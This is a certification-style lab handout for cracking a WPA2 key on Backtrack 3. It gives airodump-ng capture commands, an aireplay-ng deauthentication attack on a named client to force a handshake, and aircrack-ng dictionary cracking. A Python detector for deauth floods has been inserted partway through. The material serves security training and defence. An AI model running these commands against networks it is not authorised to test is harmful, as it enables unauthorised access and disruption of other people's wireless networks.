
©2011-BR

CEH-WPA2

Configuration:

Your machine is BT3, running Backtrack 3


The IP address of your machine is 192.168.100.99/24.

Objectives:

1. Monitor Wireless Network and HACK the WPA2 Key.

Tools:

Backtrack 3
Airodump-ng
Aireplay-ng
Aircrack-ng

Preparation:

Ensure that your wireless card is detected in your BT3 machine.

Logon to BT3 and activate your wireless card.


Detailed Steps:

1. Log on to your BT3 machine, open a console, and check your wireless configuration with this command: iwconfig

2. Look at the line 'Mode:Managed'. The interface must be switched to monitor mode; type:

bt ~ # iwconfig rausb0 mode monitor

3. After this, your wireless interface is ready to monitor and capture traffic.

4. Start capturing any wireless traffic in your environment:

bt ~ # airodump-ng rausb0


5. Choose only one wireless network to capture. Press Control-C to stop capturing.

6. In this example we are going to capture all data traffic of the belly-wlan network (MAC address 00:1C:DF:D0:A4:9C), operating on channel 11, and write the captured frames to the file belly-wlan.cap (airodump-ng appends a sequence number, so the file is named belly-wlan-01.cap):

bt ~ # airodump-ng --bssid 00:1C:DF:D0:A4:9C --channel 11 -w belly-wlan rausb0


7. To crack a WPA2 network, you must wait until a HANDSHAKE has been captured.

8. To force a handshake, disconnect one client; when that client reconnects, a new handshake takes place. Use the 'deauth' attack to disconnect a client:

bt ~ # aireplay-ng --deauth 5 -a 00:1C:DF:D0:A4:9C -c 00:1C:BF:BA:AB:80 rausb0
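The deauth burst in the step above is the noisy part of this procedure: capturing the handshake itself is passive, so a wireless IDS spots this attack by the sudden spike in deauthentication/disassociation frames aimed at one client, and networks that enable 802.11w (Protected Management Frames) reject forged deauth frames outright. The Python below is an added detection example, not part of the original lab: it takes parsed 802.11 management-frame records (constructed here, reusing the lab's BSSID and client address; in practice they would come from a monitor-mode capture or a WIDS sensor) and flags any AP/client pair whose deauth rate exceeds a threshold within a sliding window. The 1-second window and threshold of 4 frames are assumptions to tune per environment.

```python
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple

# IEEE 802.11 frame type/subtype values for the frames that tear down an association.
MGMT_TYPE = 0          # frame type: management
DISASSOC_SUBTYPE = 10  # management subtype: Disassociation
DEAUTH_SUBTYPE = 12    # management subtype: Deauthentication


class Frame(NamedTuple):
    ts: float      # capture timestamp in seconds
    ftype: int     # 802.11 type field
    subtype: int   # 802.11 subtype field
    bssid: str     # BSSID (the AP the frame claims to come from)
    dst: str       # destination address: a client, or ff:ff:... for broadcast


def is_disconnect_frame(f: Frame) -> bool:
    """True for management frames that disconnect a client (deauth or disassoc)."""
    return f.ftype == MGMT_TYPE and f.subtype in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE)


def max_in_window(times: List[float], window_s: float) -> Tuple[int, float]:
    """Largest number of timestamps that fall into any window of window_s seconds.

    times must be sorted ascending. Returns (count, start_of_that_window).
    Two-pointer sweep: advance lo until the window [times[lo], t] fits.
    """
    best, best_start, lo = 0, 0.0, 0
    for hi, t in enumerate(times):
        while t - times[lo] > window_s:
            lo += 1
        if hi - lo + 1 > best:
            best, best_start = hi - lo + 1, times[lo]
    return best, best_start


def detect_deauth_floods(frames: List[Frame], window_s: float = 1.0,
                         threshold: int = 4) -> Dict[Tuple[str, str], Tuple[int, float]]:
    """Return {(bssid, client): (peak_count, window_start)} for every AP/client
    pair that received at least `threshold` disconnect frames within any
    window_s-second window. Everything else (beacons, isolated deauths) is ignored.
    """
    per_pair: Dict[Tuple[str, str], List[float]] = defaultdict(list)
    for f in frames:
        if is_disconnect_frame(f):
            per_pair[(f.bssid, f.dst)].append(f.ts)

    alerts = {}
    for pair, times in per_pair.items():
        times.sort()
        count, start = max_in_window(times, window_s)
        if count >= threshold:
            alerts[pair] = (count, start)
    return alerts


# Constructed sample capture (not real traffic). Addresses are the lab's AP and client.
AP = "00:1c:df:d0:a4:9c"
CLIENT = "00:1c:bf:ba:ab:80"
SAMPLE_FRAMES = [
    Frame(100.00, MGMT_TYPE, 8, AP, "ff:ff:ff:ff:ff:ff"),          # beacon: benign
    Frame(100.10, MGMT_TYPE, DEAUTH_SUBTYPE, AP, "00:11:22:33:44:55"),  # one deauth: normal roaming
    # burst of five deauths to a single client within 0.4 s: what a forced handshake looks like
    Frame(120.00, MGMT_TYPE, DEAUTH_SUBTYPE, AP, CLIENT),
    Frame(120.10, MGMT_TYPE, DEAUTH_SUBTYPE, AP, CLIENT),
    Frame(120.20, MGMT_TYPE, DEAUTH_SUBTYPE, AP, CLIENT),
    Frame(120.30, MGMT_TYPE, DEAUTH_SUBTYPE, AP, CLIENT),
    Frame(120.40, MGMT_TYPE, DEAUTH_SUBTYPE, AP, CLIENT),
    # another AP sending slow, spread-out disassociations: below threshold
    Frame(200.00, MGMT_TYPE, DISASSOC_SUBTYPE, "aa:bb:cc:dd:ee:ff", "66:77:88:99:aa:bb"),
    Frame(205.00, MGMT_TYPE, DISASSOC_SUBTYPE, "aa:bb:cc:dd:ee:ff", "66:77:88:99:aa:bb"),
    Frame(210.00, MGMT_TYPE, DISASSOC_SUBTYPE, "aa:bb:cc:dd:ee:ff", "66:77:88:99:aa:bb"),
]

if __name__ == "__main__":
    for (bssid, client), (count, start) in detect_deauth_floods(SAMPLE_FRAMES).items():
        print(f"ALERT: {count} disconnect frames from {bssid} to {client} "
              f"within 1 s starting at t={start:.2f}")
```

Only the five-frame burst against the lab client is reported; the single deauth and the slow disassociations are left alone, which is the trade-off the threshold encodes: too low and legitimate roaming generates noise, too high and a short burst like the one in this lab slips through.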


9. To crack WPA you also need a dictionary file, so create a small sample dictionary:

bt ~ # nano dictionary.txt


10. Then you can start cracking with aircrack-ng:

bt ~ # aircrack-ng -a 2 belly-wlan-01.cap -w dictionary.txt
